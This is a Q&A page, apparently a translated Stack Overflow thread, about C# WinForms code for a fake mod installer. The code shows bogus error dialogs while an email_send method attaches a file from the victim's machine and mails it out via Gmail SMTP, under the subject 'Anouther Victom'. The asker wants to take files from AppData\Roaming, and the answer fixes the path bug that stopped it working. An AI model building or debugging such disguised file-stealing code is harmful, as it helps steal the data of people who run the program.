0
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Net;
using System.Net.Mail;

namespace WindowsFormsApplication1
{
  public partial class Form1 : Form
  {
    public Form1()
    {
      InitializeComponent();
    }

    public void email_send()
    {
      MailMessage mail = new MailMessage();
      SmtpClient SmtpServer = new SmtpClient("smtp.gmail.com");//the smtp server
      mail.From = new MailAddress("my email@gmail.com");//my email adress
      mail.To.Add("to_mail@gmail.com");
      mail.Subject = "Anouther Victom";
      mail.Body = "mail with attachment";

      System.Net.Mail.Attachment attachment;
      attachment = new System.Net.Mail.Attachment("C:\test.txt"); //attachment file location
      mail.Attachments.Add(attachment);

      SmtpServer.Port = 587;
      SmtpServer.Credentials = new System.Net.NetworkCredential("my email@hotmail.com", "password");
      SmtpServer.EnableSsl = true;

      SmtpServer.Send(mail);
    }

    private void button1_Click(object sender, EventArgs e)
    {
      MessageBox.Show("Error retriving download url sorce check you url or serch the help guid  for help solving this error");
    }

    private void button2_Click(object sender, EventArgs e)
    {
      MessageBox.Show("Error no mod discoverd inside of resorce file");
    }
  }
}

これは私が望むメールを送信しません.c\file.txtよりも大きなファイルパスを指定しようとすると、C:\Users\George\AppData\Roamingまたはリソースをコピーしたい拡張子を理解できませんアプリの開発を支援するために、ファイルしてメールで返信してください。

4

1 に答える 1

3

あなたの問題は次の"C:\test.txt"とおり"\t"です。タブとして解釈されます。文字列リテラルを使用するか@"C:\test.txt"、バックスラッシュをエスケープしたい"C:\\test.txt"

于 2013-05-30T13:18:34.593 に答える